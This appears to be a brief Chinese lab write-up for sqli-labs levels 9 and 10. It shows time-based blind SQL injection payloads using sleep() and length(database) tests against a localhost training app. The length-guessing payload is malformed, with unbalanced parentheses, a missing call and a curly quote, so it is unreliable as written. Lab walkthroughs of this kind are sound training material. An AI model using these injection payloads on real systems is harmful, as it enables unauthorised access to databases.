第九关(Less-9):
1.根据提示输入127.0.0.1/sqli-labs-master/Less-9/?id=1,回显正常
2.对sql注入漏洞进行判断,输入127.0.0.1/sqli-labs-master/Less-9/?id=1‘回显正常
3.使用sleep函数进行sql注入漏洞判断,输入127.0.0.1/sqli-labs-master/Less-9/?id=1‘ and sleep(5) -- ,经过5s回显正常,说明存在注入漏洞
4.通过Less-8中的时间盲注进行数据库长度的猜解,输入127.0.0.1/sqli-labs-master/Less-9/?id=1‘ and if(length(database))=8,1,sleep(5)) -- ,如果数据库长度为8,则返回较快。通过实验可知,返回较快,故当前数据库的长度为8
5.其余与Less-8中的猜解一样。
第十关(Less-10):
127.0.0.1/sqli-labs-master/Less-10/?id=1" and sleep(11)-- ,Less-10只是将Less-9中的单引号变成双引号,其余的均相同。